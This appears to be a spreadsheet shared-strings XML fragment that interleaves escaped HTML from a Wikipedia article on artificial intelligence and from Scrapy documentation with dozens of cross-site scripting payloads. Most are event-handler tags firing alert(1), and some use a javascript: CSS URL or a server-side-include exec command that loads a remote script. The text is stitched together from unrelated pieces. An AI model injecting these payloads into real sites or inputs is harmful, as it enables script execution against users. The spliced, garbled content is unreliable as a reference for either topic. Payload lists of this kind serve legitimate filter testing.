    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Isaac_Asimov" title="Isaac Asimov"&gt;Isaac Asimov &lt;/a&gt; introduced the &lt;a href="/wiki/Three_Laws_of_Robotics" title="Three Laws of Robotics"&gt;Three Laws of Robotics &lt;/a&gt; in many books and stories, most notably the "Multivac" series about a super-intelligent computer of the same name. Asimov's laws are often brought up during lay discussions of machine ethics;&lt;sup id="cite_ref-415" class="reference"&gt;&lt;a href="#cite_note-415"&gt;&amp;#91;403&amp;#93; &lt;/a&gt; &lt;/sup&gt; while almost all artificial intelligence researchers are familiar with Asimov's laws through popular culture, they generally consider the laws useless for many reasons, one of which is their ambiguity.&lt;sup id="cite_ref-416" class="reference"&gt;&lt;a href="#cite_note-416"&gt;&amp;#91;404&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;form style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;ul onbeforecut="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;embed onclick="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;map id=x tabindex=1 onfocus=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Unmanned_aerial_vehicle" title="Unmanned aerial vehicle"&gt;aerial &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;acronym draggable="true" ondragenter="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;li {list-style-image: url("javascript:alert('')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;li id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;object onpointerout=alert(1)&gt;XSS&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;input3 onpointerleave=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;html onkeydown="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;image3 onpointerenter=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t>&lt;picture id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/picture&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;caption onmouseup="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onbeforecut="alert(1)" contenteditable&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;spacer id=x tabindex=1 onactivate=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;picture ondrop=alert(1) contenteditable&gt;drop here&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Statistics" title="Statistics"&gt;Statistics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Digital_marketing" title="Digital marketing"&gt;Digital marketing &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;col onmousedown="alert(1)"&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=airesearch.com&amp;amp;rft.atitle=Deep+Neural+Networks+for+Acoustic+Modeling+in+Speech+Recognition&amp;amp;rft.date=2015-10-23&amp;amp;rft.aulast=Research&amp;amp;rft.aufirst=AI&amp;amp;rft_id=http%3A%2F%2Fairesearch.com%2Fai-research-papers%2Fdeep-neural-networks-for-acoustic-modeling-in-speech-recognition%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;code onkeydown="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Imre_Lakatos" title="Imre Lakatos"&gt;Imre Lakatos &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFNeedham1986" class="citation book"&gt;&lt;a href="/wiki/Joseph_Needham" title="Joseph Needham"&gt;Needham, Joseph &lt;/a&gt; (1986). &lt;a href="/wiki/Science_and_Civilization_in_China" class="mw-redirect" title="Science and Civilization in China"&gt;&lt;i&gt;Science and Civilization in China: Volume 2 &lt;/i&gt; &lt;/a&gt;. Caves Books Ltd. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Science+and+Civilization+in+China%3A+Volume+2&amp;amp;rft.pub=Caves+Books+Ltd.&amp;amp;rft.date=1986&amp;amp;rft.aulast=Needham&amp;amp;rft.aufirst=Joseph&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;track onpointerenter=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;html style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;legend onpointerup=alert(1)&gt;XSS&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;!--#exec cmd="/bin/echo '&lt;SCR'"--&gt;&lt;!--#exec cmd="/bin/echo 'IPT SRC=http://.rocks/.js&gt;&lt;/SCRIPT&gt;'"</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Buckley, Chris; Mozur, Paul (22 May 2019). &lt;a rel="nofollow" class="external text" href="https://www.nytimes.com/2019/05/22/world/asia/china-surveillance-xinjiang.html"&gt;"How China Uses High-Tech Surveillance to Subdue Minorities" &lt;/a&gt;. &lt;i&gt;The New York Times &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+New+York+Times&amp;amp;rft.atitle=How+China+Uses+High-Tech+Surveillance+to+Subdue+Minorities&amp;amp;rft.date=2019-05-22&amp;amp;rft.aulast=Buckley&amp;amp;rft.aufirst=Chris&amp;amp;rft.au=Mozur%2C+Paul&amp;amp;rft_id=https%3A%2F%2Fwww.nytimes.com%2F2019%2F05%2F22%2Fworld%2Fasia%2Fchina-surveillance-xinjiang.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Search and optimization </t>
  </si>
  <si>
    <t>&lt;nobr onpointerdown=alert(1)&gt;XSS&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;slot ondragover=alert(1) contenteditable&gt;drop here&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;link onmouseover="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Panpsychism" title="Panpsychism"&gt;Panpsychism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Simple exhaustive searches&lt;sup id="cite_ref-Uninformed_search_188-0" class="reference"&gt;&lt;a href="#cite_note-Uninformed_search-188"&gt;&amp;#91;184&amp;#93; &lt;/a&gt; &lt;/sup&gt; are rarely sufficient for most real-world problems: the &lt;a href="/wiki/Search_algorithm" title="Search algorithm"&gt;search space &lt;/a&gt; (the number of places to search) quickly grows to &lt;a href="/wiki/Astronomically_large" class="mw-redirect" title="Astronomically large"&gt;astronomical numbers &lt;/a&gt;. The result is a search that is &lt;a href="/wiki/Computation_time" class="mw-redirect" title="Computation time"&gt;too slow &lt;/a&gt; or never completes. The solution, for many problems, is to use "&lt;a href="/wiki/Heuristics" class="mw-redirect" title="Heuristics"&gt;heuristics &lt;/a&gt;" or "rules of thumb" that prioritize choices in favor of those that are more likely to reach a goal and to do so in a shorter number of steps. In some search methodologies heuristics can also serve to entirely eliminate some choices that are unlikely to lead to a goal (called "&lt;a href="/wiki/Pruning_(algorithm)" class="mw-redirect" title="Pruning (algorithm)"&gt;pruning &lt;/a&gt; the &lt;a href="/wiki/Search_tree" title="Search tree"&gt;search tree &lt;/a&gt;"). &lt;a href="/wiki/Heuristics" class="mw-redirect" title="Heuristics"&gt;Heuristics &lt;/a&gt; supply the program with a "best guess" for the path on which the solution lies.&lt;sup id="cite_ref-Informed_search_189-0" class="reference"&gt;&lt;a href="#cite_note-Informed_search-189"&gt;&amp;#91;185&amp;#93; &lt;/a&gt; &lt;/sup&gt; Heuristics limit the search for solutions into a smaller sample size.&lt;sup id="cite_ref-FOOTNOTETecuci2012_130-1" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTETecuci2012-130"&gt;&amp;#91;127&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;&lt;a rel="nofollow" class="external text" href="https://www.wired.com/2017/05/win-china-alphagos-designers-explore-new-ai/"&gt;"After Win in China, AlphaGo's Designers Explore New AI" &lt;/a&gt;. &lt;i&gt;Wired &lt;/i&gt;. 27 May 2017. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170602234726/https://www.wired.com/2017/05/win-china-alphagos-designers-explore-new-ai/"&gt;Archived &lt;/a&gt; from the original on 2 June 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Wired&amp;amp;rft.atitle=After+Win+in+China%2C+AlphaGo%27s+Designers+Explore+New+AI&amp;amp;rft.date=2017-05-27&amp;amp;rft_id=https%3A%2F%2Fwww.wired.com%2F2017%2F05%2Fwin-china-alphagos-designers-explore-new-ai%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;base onmousemove="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Customize the input and output of your spiders.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;frameset id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Artificial_general_intelligence" title="Artificial general intelligence"&gt;Artificial general intelligence &lt;/a&gt; and &lt;a href="/wiki/AI-complete" title="AI-complete"&gt;AI-complete &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;bdo oncopy="alert(1)" contenteditable&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Network_architecture" title="Network architecture"&gt;Network architecture &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;The most dramatic case of sub-symbolic AI being pushed into the background was the devastating critique of &lt;a href="/wiki/Perceptron" title="Perceptron"&gt;perceptrons &lt;/a&gt; by &lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Marvin Minsky &lt;/a&gt; and &lt;a href="/wiki/Seymour_Papert" title="Seymour Papert"&gt;Seymour Papert &lt;/a&gt; in 1969. See &lt;a href="/wiki/History_of_AI" class="mw-redirect" title="History of AI"&gt;History of AI &lt;/a&gt;, &lt;a href="/wiki/AI_winter" title="AI winter"&gt;AI winter &lt;/a&gt;, or &lt;a href="/wiki/Frank_Rosenblatt" title="Frank Rosenblatt"&gt;Frank Rosenblatt &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;input2 onpointerout=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=WIRED&amp;amp;rft.atitle=World%27s+First+Self-Driving+Semi-Truck+Hits+the+Road&amp;amp;rft.date=2015-05-05&amp;amp;rft.aulast=Davies&amp;amp;rft.aufirst=Alex&amp;amp;rft_id=https%3A%2F%2Fwww.wired.com%2F2015%2F05%2Fworlds-first-self-driving-semi-truck-hits-road%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Kaplan, Andreas; Haenlein, Michael (1 January 2019). "Siri, Siri, in my hand: Who's the fairest in the land? On the interpretations, illustrations, and implications of artificial intelligence". &lt;i&gt;Business Horizons &lt;/i&gt;. &lt;b&gt;62 &lt;/b&gt; (1): 15–25. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.bushor.2018.08.004"&gt;10.1016/j.bushor.2018.08.004 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Business+Horizons&amp;amp;rft.atitle=Siri%2C+Siri%2C+in+my+hand%3A+Who%27s+the+fairest+in+the+land%3F+On+the+interpretations%2C+illustrations%2C+and+implications+of+artificial+intelligence&amp;amp;rft.volume=62&amp;amp;rft.issue=1&amp;amp;rft.pages=15-25&amp;amp;rft.date=2019-01-01&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.bushor.2018.08.004&amp;amp;rft.aulast=Kaplan&amp;amp;rft.aufirst=Andreas&amp;amp;rft.au=Haenlein%2C+Michael&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Pierre_Duhem" title="Pierre Duhem"&gt;Pierre Duhem &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;iframe draggable="true" ondragstart="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem oncopy="alert(1)" contenteditable&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>&lt;frameset&gt;&lt;frame id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;animate onpointerout=alert(1)&gt;XSS&lt;/animate&gt;</t>
  </si>
  <si>
    <t>&lt;frame onpointerleave=alert(1)&gt;XSS&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;xmp id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/xmp&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmouseup="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;multicol onclick="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-4"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-4"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>This list of intelligent traits is based on the topics covered by the major AI textbooks, including:</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_repository" title="Software repository"&gt;Software repository &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;picture oncopy="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;spacer id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/spacer&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;picture id=x tabindex=1 onactivate=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onmouseout="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;sup onmouseout="alert(1)"&gt;test&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;content oncut="alert(1)" contenteditable&gt;test&lt;/content&gt;</t>
  </si>
  <si>
    <t>&lt;cite id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/cite&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;mark style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;div role="search"&gt;</t>
  </si>
  <si>
    <t>&lt;basefont oncut="alert(1)" contenteditable&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">           &lt;div itemprop="articleBody"&gt;     </t>
  </si>
  <si>
    <t>&lt;dir onpointermove=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;u ondragover=alert(1) contenteditable&gt;drop here&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mathematical_optimization" title="Mathematical optimization"&gt;Search methodology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onpointermove=alert(1)&gt;XSS&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Social_software" title="Social software"&gt;Social information systems &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Andrew_Yang" title="Andrew Yang"&gt;Andrew Yang &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;select style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="http://fusion.net/story/54583/the-case-against-killer-robots-from-a-guy-actually-building-ai/"&gt;"The case against killer robots, from a guy actually working on artificial intelligence" &lt;/a&gt;. &lt;i&gt;Fusion.net &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160204175716/http://fusion.net/story/54583/the-case-against-killer-robots-from-a-guy-actually-building-ai/"&gt;Archived &lt;/a&gt; from the original on 4 February 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;31 January </t>
  </si>
  <si>
    <t>&lt;data id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/data&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;audio onbeforepaste="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;div id="p-personal" role="navigation" class="" aria-labelledby="p-personal-label"&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onpaste="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;td onblur=alert(1) tabindex=1 id=x&gt;&lt;/td&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-260"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-260"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Cell&amp;amp;rft.atitle=Identifying+Medical+Diagnoses+and+Treatable+Diseases+by+Image-Based+Deep+Learning&amp;amp;rft.volume=172&amp;amp;rft.issue=5&amp;amp;rft.pages=1122-1131.e9&amp;amp;rft.date=2018&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.cell.2018.02.010&amp;amp;rft_id=info%3Apmid%2F29474911&amp;amp;rft.aulast=Kermany&amp;amp;rft.aufirst=D&amp;amp;rft.au=Goldbaum%2C+M&amp;amp;rft.au=Zhang%2C+Kang&amp;amp;rft_id=https%3A%2F%2Fwww.cell.com%2Faction%2FcaptchaChallenge%3FredirectUri%3D%252Fcell%252Fpdf%252FS0092-8674%252818%252930154-5.pdf&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;embed id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/embed&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dir draggable="true" ondragend="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;samp onkeydown="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;img onpointerleave=alert(1)&gt;XSS&lt;/img&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-202"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-202"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>and have been a persistent theme in &lt;a href="/wiki/Science_fiction" title="Science fiction"&gt;science fiction &lt;/a&gt;.</t>
  </si>
  <si>
    <t>&lt;label id=x tabindex=1 onfocus=alert(1)&gt;&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Decision_support_system" title="Decision support system"&gt;Decision support system &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;p onkeydown="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;nobr id=x tabindex=1 onactivate=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;address ondrop=alert(1) contenteditable&gt;drop here&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;cite onpointerenter=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onmouseover="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;link draggable="true" ondragenter="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;output onmouseout="alert(1)"&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;basefont draggable="true" ondragenter="alert(1)"&gt;test&lt;/basefont&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;slot id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onpointerdown=alert(1)&gt;XSS&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Laws_of_robotics" title="Laws of robotics"&gt;Laws &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;audio onmouseout="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFHaugeland1985"&gt;Haugeland 1985 &lt;/a&gt;, pp.&amp;#160;6–9 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Ask or search questions in the &lt;a class="reference external" href="https://www.reddit.com/r/scrapy/"&gt;Scrapy subreddit&lt;/a&gt;.&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;body onpointermove=alert(1)&gt;XSS&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;dt draggable="true" ondragend="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;data id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;var draggable="true" ondragenter="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;frame ondragover=alert(1) contenteditable&gt;drop here&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;p class="caption"&gt;&lt;span class="caption-text"&gt;First steps</t>
  </si>
  <si>
    <t>&lt;source onpointerenter=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;input2 onpointerleave=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t>&lt;samp onbeforecopy="alert(1)" contenteditable&gt;test&lt;/samp&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tfoot ondragover=alert(1) contenteditable&gt;drop here&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Claytronics" title="Claytronics"&gt;Claytronics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-70"&gt;&lt;a href="#See_also"&gt;&lt;span class="tocnumber"&gt;11 </t>
  </si>
  <si>
    <t>&lt;picture onpointerup=alert(1)&gt;XSS&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=63" title="Edit section: Strong AI hypothesis"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;sub onpointerover=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;hgroup id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;table class="vertical-navbox nowraplinks" style="float:right;clear:right;width:22.0em;margin:0 0 1.0em 1.0em;background:#f9f9f9;border:1px solid #aaa;padding:0.2em;border-spacing:0.4em 0;text-align:center;line-height:1.4em;font-size:88%;width: 16em;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th style="padding:0.2em 0.4em 0.2em;font-size:145%;line-height:1.2em"&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointerup=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="stylesheet" href="https://assets.readthedocs.org/static/css/readthedocs-doc-embed.css" type="text/css" /&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_probability_and_statistics" title="Glossary of probability and statistics"&gt;Probability and statistics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Write the rules to crawl your websites.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;listing onmouseup="alert(1)"&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;bgsound ondrop=alert(1) contenteditable&gt;drop here&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Representing_time-94"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Representing_time_94-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Representing_time_94-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
